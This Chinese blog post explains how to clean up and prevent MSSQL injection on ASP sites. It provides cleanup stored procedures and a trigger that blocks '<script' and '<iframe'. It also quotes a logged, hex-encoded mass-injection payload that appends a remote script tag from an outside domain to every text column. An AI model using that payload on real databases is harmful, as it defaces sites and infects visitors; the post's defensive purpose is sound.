MSSql注入的清理及防范

最新推荐文章于 2021-12-09 15:55:39 发布
最新推荐文章于 2021-12-09 15:55:39 发布
阅读量68 收藏
点赞数
文章标签: 数据库
本文探讨了ASP+MSSQL开发网站时可能遇到的安全问题,特别是SQL注入风险,并提供了具体的防护措施,包括如何清理已注入的恶意代码及利用触发器进行实时防护。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

asp+mssql开发的网站如果对get/post参数处理不好,很容易被注入,在数据库中插入类似<script src=....></script>和<iframe src=... width=0 height=0></iframe>的病毒或木马代码,使得访问该站点的访问者访问时运行该代码。


查看被注入的web日志可以发现形如下面的日志信息
news_id=674;dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E6A786D6D74762E636F6D2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);--

使用如下sql存储过程清理被注入的木马等恶意程序代码:

SET QUOTED_IDENTIFIER OFF GO SET ANSI_NULLS OFF GO Create proc [dbo].[ReplaceKeyWord] @old nvarchar(100), @new nvarchar(100) as declare @sql nvarchar(1000) set @sql=N' declare @s nvarchar(4000),@tbname sysname select @s=N'''',@tbname=N''?'' select @s=@s+N'',''+quotename(a.name)+N''=replace(''+quotename(a.name)+N'',N'''''+@old+''''',N'''''+@new+''''')'' from syscolumns a,systypes b where a.id=object_id(@tbname) and a.xusertype=b.xusertype and b.name like N''%char'' if @@rowcount>0 begin set @s=stuff(@s,1,1,N'''') exec(N''update ''+@tbname+'' set ''+@s) end ' --print @sql exec sp_msforeachtable @sql; set @sql=N' declare @s nvarchar(4000),@tbname sysname select @s=N'''',@tbname=N''?'' select @s=@s+quotename(a.name)+N'','' from syscolumns a,systypes b where a.id=object_id(@tbname) and a.xusertype=b.xusertype and b.name like N''%text'' if @@rowcount>0 begin exec UpdateTextColumn @tbname,@s,'''+@old+''','''+@new+''' end ' ; exec sp_msforeachtable @sql GO SET QUOTED_IDENTIFIER OFF GO SET ANSI_NULLS ON GO SET QUOTED_IDENTIFIER OFF GO SET ANSI_NULLS OFF GO CREATE proc [dbo].[UpdateTextColumn] @Table varchar(100), @Columns varchar(200),--eg:Column1,Column2, @old varchar(100), @new varchar(100) as set nocount on declare @sql nvarchar(2000) declare @Column varchar(50) declare @cpos int,@npos int set @cpos=1; set @npos=1; set @npos=charindex(',',@Columns,@cpos); while(@npos>0) begin set @Column = substring(@Columns,@cpos,@npos-@cpos); set @cpos = @npos+1 set @npos=charindex(',',@Columns,@cpos); set @sql = 'update '+@Table+' set '+@Column+'=replace(cast('+@Column+' as varchar(8000)),@old,@new) where Datalength('+@Column+')<=8000'; EXECUTE sp_executesql @Sql, N'@old varchar(100),@new varchar(100)', @old, @new declare @ptr binary(16) ,@offset int,@dellen int set @dellen = len(@old) set @offset = 1 while @offset>=1 begin set @offset = 0 set @sql = 'select top 1 @offset = charindex('''+@old+''' , '+@Column+'), @ptr = textptr('+@Column+') from '+@Table+' where Datalength('+@Column+')>8000 and '+@Column+' like ''%'+@old+'%'''; EXEC sp_executesql @Sql,N'@offset int OUTPUT,@ptr binary(16) OUTPUT,@old varchar(100)', @offset OUTPUT,@ptr OUTPUT,@old; if @offset > 0 begin set @offset = @offset-1 set @sql='updatetext '+@Table+'.'+@Column+' @ptr @offset @dellen @new'; EXEC sp_executesql @Sql,N'@offset int ,@ptr binary(16),@dellen int,@new varchar(100)',@offset,@ptr,@dellen,@new; end end end GO SET QUOTED_IDENTIFIER OFF GO SET ANSI_NULLS ON GO

使用方法:

exec ReplaceKeyWord '需要替换的字符','替换成的新字符'
exec ReplaceKeyWord '<iframe src=... width=0 height=0></iframe>',''

上面的语句执行后会将整个数据库中所有的表的所有字段中含有的<iframe src=... width=0 height=0></iframe>替换掉.

对程序参数进行严格的类型判断配合通用防注入程序(网上可以找到),一般就不会出现被注入的情况了,如果仍然不可以的话,可以在MSSQL里加如触发器对插入的内容进行限制。
例如:

CREATE TRIGGER [delscript_danwei] ON [dbo].[danwei] FOR INSERT, UPDATE AS begin declare @scontent as nvarchar(4000) select @scontent=title+content from inserted if CHARINDEX('<script',lower(@scontent))>0 or CHARINDEX('<iframe',lower(@scontent))>0 begin RAISERROR ('危险脚本', 16, 1) ROLLBACK end end

上面的触发器是在danwei表上加的限制在title和content字段插入类似<script....../scrip>和<iframe....../iframe>字符的,如果插入或更新的内容含有类似字符,系统会执行回滚,信息不会被插入或更新。一般情况下很多注入都是通过程序自动完成的,所以用触发器能起到一定的防范作用。

iteye_20785
关注
sql server 防 注入
小半的博客
12-28 594
sql server 防 注入 这里使用的是参数化 SqlParameter useremail = new SqlParameter("@useremail", user.user_Email); SqlParameter pwd = new SqlParameter("@pwd", user.user_pwd); SqlPara...
MSSQL注入的清除方法
weixin_33924220的博客
07-22 129
又过一年了,又到了写年终总结的时候。回忆起2009年年头服务器被注入时的事情,为了删除被插入的字符串,在当时记下了这样一段SQL代码。 /***********定义要去除的字符,请注意,肯定不止一条,我的服务器就查到许多不同的代码************/ declare @delStr nvarchar(500) set @delStr='<script ...
php mssql注入,MSSQL通用防注入程序的漏洞
weixin_42356073的博客
04-03 138
现在基于web的攻击一般都是注入。导致注入的原因一般为对变量的过滤不完全,从而可以使入侵者非法执行程序或查询修改任意数据。随着注入攻击的愈演愈烈,一些专门的过滤代码应运而生。但一些过滤代码的不完善很可能导致新的攻击。下面就以目前应用最广泛的过现在基于web的攻击一般都是注入。导致注入的原因一般为对变量的过滤不完全,从而可以使入侵者非法执行程序或查询修改任意数据。随着注入攻击的愈演愈烈,一些专门的过...
【SQL注入技巧拓展】————8、MSSQL 注入攻击与防御
Fly_鹏程万里
12-23 934
本文所用数据库涉及SQL Server 2k5,2k8,2k12,其次对于绕过姿势和前文并无太大差别,就不做过多的讲解,主要放在后面的提权上 系统库 注释 实例 版本&amp;数据库当前用户&amp;主机名 版本 如果是2012的数据库返回为True 数据库当前用户 实例: 主机名 库&amp;表&amp;列 库名 获取表名 ...
php防止SQL注入详解及防范
12-19
1. **数据过滤**:对用户输入进行验证和清理,确保输入的数据符合预期的格式。例如,如果你知道用户名只包含字母和数字,那么在接收输入前应该检查并过滤掉其他字符。你可以使用PHP的内置函数如`preg_match()`配合...
理解MySQL SQL注入攻击与防范
"这篇文档详细介绍了基于MySQL的SQL注入攻击,包括其概念、危害、以及如何进行防御。" SQL注入是一种常见的网络安全攻击方式,主要针对使用SQL语言的数据库系统,如MySQL。攻击者通过在Web表单中输入恶意的SQL代码...
MySQL SQL注入攻击详解与防范
"这篇资料主要介绍了基于MySQL的SQL注入攻击,包括其原理、危害和如何进行防范。SQL注入是一种常见的网络安全威胁,攻击者通过输入恶意的SQL代码来获取或篡改数据库中的敏感信息。" 在Web开发中,SQL注入攻击是...
ASP.NET网站中SQL注入攻击及防范.pdf
09-19
防范SQL注入攻击需要综合考虑客户端和服务器端的措施: 1. 客户端防范措施: a. 约束用户输入:通过验证用户输入数据,防止潜在危险数据的输入。 b. 使用验证控件:利用***内建的验证控件,如...
浅析MySQL的注入安全问题
09-10
总结来说,MySQL注入安全问题的浅析应包含如何识别潜在的注入点,避免直接拼接用户输入到SQL语句中,并采用正确的安全编码实践。这包括使用参数化查询、存储过程、适当的数据类型和长度验证,以及始终对用户输入进行...
注意那些容易被忽略的MSSQL注入技巧
weixin_42034000的博客
12-23 350
本篇文章由泉州SEOwww.234yp.com 整理发布,mssql数据库www.234yp.com/Article/168190.html谢谢合作!mssql数据库   下面我要谈到一些Sqlserver新的Bug,虽然本人经过长时间的努力,当然也有点幸运的成分在内,才得以发现,不敢一个人独享,拿出来请大家鉴别。   1.关于Openrowset和Opendatasource   可能这个技巧早有人已经会了,就是利用openrowset发送本地命令。通常我们的用法是(包括MSDN的列子)如下...
MSSQL注入防范安全策略大全
weixin_34087307的博客
06-03 209
      前SQL INJECTION的攻击测试愈演愈烈,很多大型的网站和论坛都相继被注入。这些网站一般使用的多为SQL SERVER数据库,正因为如此,很多人开始怀疑SQL SERVER的安全性。其实SQL SERVER 2000已经通过了美国政府的C2级安全认证-这是该行业所能拥有的最高认证级别,所以使用SQL SERVER还是相当的安全的。当然和ORCAL、DB2等还是有差距,但是SQL ...
绕过MSSQL注入的一些解决办法
eldn__的专栏
11-20 3036
绕过MSSQL注入的一些解决办法 在工作中还是其他时候都时常遇见一些网站加了防注入代码,这确实让人头痛不已,不过另一个方面让我终于又有了一个新的可以深入琢磨的课题,同时也看见了前辈们提供的很多绕过防注入方法,都着实让我受益匪浅。把思路集中一下,具有列出以下的几点: 1.编码处理 2.语句变换 3.其他 对这几点还是做一些简要的说明吧! 编码处理-> 关于编码问题
MySQL如何防止SQL注入
热门推荐
小红的布丁的博客
08-04 2万+
       最近,在写程序时开始注意到sql注入的问题,由于以前写代码时不是很注意,有一些sql会存在被注入的风险,那么防止sql注入的原理是什么呢?我们首先通过PrepareStatement这个类来学习一下吧!  作为一个IT业内人士只要接触过数据库的人都应该知道sql注入的概念及危害,那么什么叫sql注入呢?我在这边先给它来一个简单的定义:sql注入,简单来说就是用户在前端web页面输入恶...
防止SQL注入的五种方法
我是一只蘑菇17的博客
12-09 2万+
一、SQL注入简介 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。    SQL注入是比...
sql注入实例分析
weixin_30624825的博客
07-23 3550
什么是SQL注入攻击?引用百度百科的解释: sql注入_百度百科: 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执...
MSSQL注入
秋水的博客
09-04 9291
MSSQL数据库 数据库简介 MSSQL是指微软的SQLServer数据库服务器,它是一个数据库平台,提供数据库的从服务器到终端的完整的解决方案,其中数据库服务器部分,是一个数据库管理系统,用于建立、使用和维护数据库。属关系型数据库 注入简介 MSSQL注入攻击是最为复杂的数据库攻击技术,由于该数据库功能十分强大,存储过程以及函数语句十分丰富,这些灵活的语句造就了新颖的攻击思路 ...
SqlServer_Sql防止注入
weixin_30734435的博客
07-27 550
注入式攻击的详细解释SQL下面我们将以一个简单的用户登陆为例,结合代码详细解释一下SQL注入式攻击,与及他的防范措施。对于一个简单的用户登陆可能的代码如下:try{ string strUserName = this.txtUserName.Text; string strPwd = this.txtPwd.Text; string strSql = "select * from...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值